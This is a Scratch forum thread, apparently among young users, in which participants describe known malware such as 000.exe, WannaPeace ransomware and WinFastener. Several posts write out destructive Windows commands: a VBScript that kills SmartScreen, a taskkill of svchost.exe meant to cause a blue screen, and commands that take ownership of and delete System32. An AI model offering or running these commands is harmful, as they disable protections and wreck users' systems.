Discuss Scratch

LandonHarter
Scratcher
1000+ posts

Computer Viruses

beanyboy512 wrote:

Has anyone mentioned BonziBUDDY? It was a spyware that only lasted about 5 years . When you first ran the program it would ask for name age and other stuff . Bonzi Software had to pay $75k for violating COPPA .
We've mentioned BonziBuddy a lot.

Shear frame:


LandonHarter
I prefer to be called Landon. Don't use my full username too much.

—————————————————————————————————————————————————————————————————
Male|15 y/o|English|Rain World, Rhythm Doctor, No Man's Sky|American|Mineral Fish fandom co-founder|Neutral Sociality|#9d0|Chaotic Neutral

“A lack of planning on your part does not constitute an emergency on mine.”



beanyboy512
Scratcher
500+ posts

Computer Viruses

LandonHarter wrote:

beanyboy512 wrote:

Has anyone mentioned BonziBUDDY? It was a spyware that only lasted about 5 years . When you first ran the program it would ask for name age and other stuff . Bonzi Software had to pay $75k for violating COPPA .
We've mentioned BonziBuddy a lot.

Shear frame:
-snip-
Dang. It would be hard to find with 148 pages tho
Has anyone heard of 000.exe? Its a creepy malware which would first show a colorshifting image of a road (after you confirm the UAC pop-up). its not really effective in destroying a PC (unless you count lag of files). It uses a Maldal payload to make a bunch of text files on the desktop and makes text file images be a red box with the text “UR NEXT” and the text files were infinite “UR NEXT”s. During the “color road” payload it renames the windows account, you guessed it “UR NEXT” and disables Task Manager all before rebooting. When you reload the second payload with what was said in the the 4th to 5th sentence and text boxes with the only word in them being “run away” being spammed by conhost.exe so you need to kill it before you get to work on runaway.exe which you kill both in command prompt and it changes your background to accent black. its easy to delete just removing temp files and using reg to restore Task Manager to end the rest. You need to delete 7DDA.tmp as part of removal and fix your wallpaper and name. You need to get rid of EVERY “UR NEXT” file and the OPENME(which shows a creepy message) use a folder for your important desktop folders and store it somewhere memorable out of desktop then delete everything. And use a program you trust like FilesTypesMan to restore your text icons.
EDIT: Forgot to mention that you need to restart after removal

Last edited by beanyboy512 (Dec. 6, 2021 13:32:02)


The image below is publicly controlled, i may remove it if i do not condone what it is
-Quantum_Studios-
Scratcher
500+ posts

Computer Viruses

LandonHarter wrote:

-Quantum_Studios- wrote:

golden fish virus
you get it when you make off topic posts

this but all over your computer
you mean quartz fish virus?
oops

Vote Rascal in 2022!
beanyboy512
Scratcher
500+ posts

Computer Viruses

I was searching the Malware wiki and found this ransomware named WannaPeace. For some reason it targets Brazilin computers and other Portuguese speakers. it locks a lot of user made files then you get

@AnonymousBr – WannaPeace wrote:

Sorry, your files have been encrypted!
Please refer to us as Anonymous, and Anonymous only.
We are an idea. An idea that can not be contained. REDACTED
Thousands of human beings are now REDACTED …
All as victims of a REDACTED
But unfortunately only words will not change the situation of these human beings …
YOUR ACCOUNT NAME if you want your files back: make a contribution
Remember, by conniving you will not only be recovering your files …
… and yes * giving to recover the dignity of these REDACTED …
Please send your contribution of only: 0.08 Bitcoins to wallet:
RANDOM CHARCTERS
in Portuguese like what the heck?
NOTE: i put REDACTED on stuff i think is not suiting for scratch

The image below is publicly controlled, i may remove it if i do not condone what it is
beanyboy512
Scratcher
500+ posts

Computer Viruses

Anyone hear of WinFastener? Its a “joke program” that would show up with:

A32 wrote:

Hello. This is A32. I just want to say that I really miss the times when viruses didnt slowly corrupt and take over your system, but instead banged you with a message that sayed your system is 0wned. Dont you just miss those times?
OK
then you get this

lol wrote:

Your system is 0wnd
and would bounce playing music and deletes hal.dll and your computer wouldn't be able to boot up because of that


The image below is publicly controlled, i may remove it if i do not condone what it is
Marc92020
Scratcher
1000+ posts

Computer Viruses

is it possible to make a virus with vbs that can kill a task?

Marc92020
i do stuff

image updates whenever i check
beanyboy512
Scratcher
500+ posts

Computer Viruses

Marc92020 wrote:

is it possible to make a virus with vbs that can kill a task?
No idea. Ima try to find out though
EDIT: didn't find an exact answer instead i found code:

KillSmartScreen.vbs wrote:

Dim oShell : Set oShell = CreateObject(“WScript.Shell”)

'Kill smartscreen.exe aka Windows Defender SmartScreen

oShell.Run “taskkill /f /im smartscreen.exe”
it kills windows smartscreen

Last edited by beanyboy512 (Dec. 6, 2021 20:54:05)


The image below is publicly controlled, i may remove it if i do not condone what it is
MagicCrayon9342
Scratcher
1000+ posts

Computer Viruses

beanyboy512 wrote:

Marc92020 wrote:

is it possible to make a virus with vbs that can kill a task?
No idea. Ima try to find out though
EDIT: didn't find an exact answer instead i found code:

KillSmartScreen.vbs wrote:

Dim oShell : Set oShell = CreateObject(“WScript.Shell”)

'Kill smartscreen.exe aka Windows Defender SmartScreen

oShell.Run “taskkill /f /im smartscreen.exe”
it kills windows smartscreen
taskkill /f /im svchost.exe for a blue screen

beanyboy512
Scratcher
500+ posts

Computer Viruses

MagicCrayon9342 wrote:

beanyboy512 wrote:

Marc92020 wrote:

is it possible to make a virus with vbs that can kill a task?
No idea. Ima try to find out though
EDIT: didn't find an exact answer instead i found code:

KillSmartScreen.vbs wrote:

Dim oShell : Set oShell = CreateObject(“WScript.Shell”)

'Kill smartscreen.exe aka Windows Defender SmartScreen

oShell.Run “taskkill /f /im smartscreen.exe”
it kills windows smartscreen
taskkill /f /im svchost.exe for a blue screen
You are right I just crashed my PC

The image below is publicly controlled, i may remove it if i do not condone what it is
9pfs
Scratcher
100+ posts

Computer Viruses

beanyboy512 wrote:

MagicCrayon9342 wrote:

beanyboy512 wrote:

Marc92020 wrote:

is it possible to make a virus with vbs that can kill a task?
No idea. Ima try to find out though
EDIT: didn't find an exact answer instead i found code:

KillSmartScreen.vbs wrote:

Dim oShell : Set oShell = CreateObject(“WScript.Shell”)

'Kill smartscreen.exe aka Windows Defender SmartScreen

oShell.Run “taskkill /f /im smartscreen.exe”
it kills windows smartscreen
taskkill /f /im svchost.exe for a blue screen
You are right I just crashed my PC
OMG, add it to my list of things to try

Update to Chrome 98 immediately More info
Share


topic/571765 MUST be apologized for.
Turns out, it was!!!

LegoManiac04
Scratcher
1000+ posts

Computer Viruses

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
… then maybe you shouldn't have posted a script that would literally wipe their computer..?

MagicCrayon9342
Scratcher
1000+ posts

Computer Viruses

LegoManiac04 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
… then maybe you shouldn't have posted a script that would literally wipe their computer..?
its literally in the computer viruses topic is it not…?

Marc92020
Scratcher
1000+ posts

Computer Viruses

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer

Marc92020
i do stuff

image updates whenever i check
ScratchcatandGobo
Scratcher
1000+ posts

Computer Viruses

Marc92020 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer
Oh man.. Please stop posting malware in the forums. It broke that other guy's computer.

Yeah, but at least we've learned something today… that every moment of our life should be lived to the fullest because it can be very long or very short, my friend. - Gumball
I felt like I wanted to develop games on here, so I won't leave! (for now)
(last edited 2/8/24)





























MagicCrayon9342
Scratcher
1000+ posts

Computer Viruses

ScratchcatandGobo wrote:

Marc92020 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer
Oh man.. Please stop posting malware in the forums. It broke that other guy's computer.
it was a joke as well.
for all I know… even the person that supposedly ran it was probably joking

Last edited by MagicCrayon9342 (Dec. 15, 2021 02:21:48)


ScratchcatandGobo
Scratcher
1000+ posts

Computer Viruses

MagicCrayon9342 wrote:

ScratchcatandGobo wrote:

Marc92020 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer
Oh man.. Please stop posting malware in the forums. It broke that other guy's computer.
it was a joke as well.
for all I know… even the person that supposedly ran it was probably joking
oh okay.

Yeah, but at least we've learned something today… that every moment of our life should be lived to the fullest because it can be very long or very short, my friend. - Gumball
I felt like I wanted to develop games on here, so I won't leave! (for now)
(last edited 2/8/24)





























LegoManiac04
Scratcher
1000+ posts

Computer Viruses

MagicCrayon9342 wrote:

ScratchcatandGobo wrote:

Marc92020 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer
Oh man.. Please stop posting malware in the forums. It broke that other guy's computer.
it was a joke as well.
for all I know… even the person that supposedly ran it was probably joking
That's why tonetags/tone indicators are great

9pfs
Scratcher
100+ posts

Computer Viruses

medians wrote:

MagicCrayon9342 wrote:

9pfs wrote:

beanyboy512 wrote:

MagicCrayon9342 wrote:

beanyboy512 wrote:

Marc92020 wrote:

is it possible to make a virus with vbs that can kill a task?
No idea. Ima try to find out though
EDIT: didn't find an exact answer instead i found code:

KillSmartScreen.vbs wrote:

Dim oShell : Set oShell = CreateObject(“WScript.Shell”)

'Kill smartscreen.exe aka Windows Defender SmartScreen

oShell.Run “taskkill /f /im smartscreen.exe”
it kills windows smartscreen
taskkill /f /im svchost.exe for a blue screen
You are right I just crashed my PC
OMG, add it to my list of things to try
or

takeown /F C:\Windows\System32
del C:\Windows\System32\
I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
omg lol. Wonder why. Also, nice 8-bit CPU that can run scratch.

Update to Chrome 98 immediately More info
Share


topic/571765 MUST be apologized for.
Turns out, it was!!!

HenryOmarCCCmango
Scratcher
21 posts

Computer Viruses

MagicCrayon9342 wrote:

ScratchcatandGobo wrote:

Marc92020 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer
Oh man.. Please stop posting malware in the forums. It broke that other guy's computer.
it was a joke as well.
for all I know… even the person that supposedly ran it was probably joking
Oh, ok. Thank goodness!

Hello!

This is my signature! It appears at the bottom of all my posts. If you want to make or change your signature, go to the bottom of the main forum page and choose “Change my signature”. You can use many cool and unique text, blocks, and emojis to make your text stand out!

Anyways, I am a scratcher that makes projects (sometimes remixes) about games, art, and more! Check out my projects!…
Currently working on a new and improved signature! Just wait and see!… Hopefully, no kumquats will eat my signature!
TurtleLegos
Scratcher
1000+ posts

Computer Viruses

ScratchcatandGobo wrote:

Marc92020 wrote:

MagicCrayon9342 wrote:

medians wrote:

I did it and my computer doesn’t turn on. I can’t believe this wowowoowowowow
you weren't supposed to….
i think they were just joking
if they weren't then they probably used it on a virtual machine
if they didnt well rip their computer
Oh man.. Please stop posting malware in the forums. It broke that other guy's computer.
oh my

BE DRY, MOIST IS TOO MOIST

hey im back! march 3 2024

Powered by DjangoBB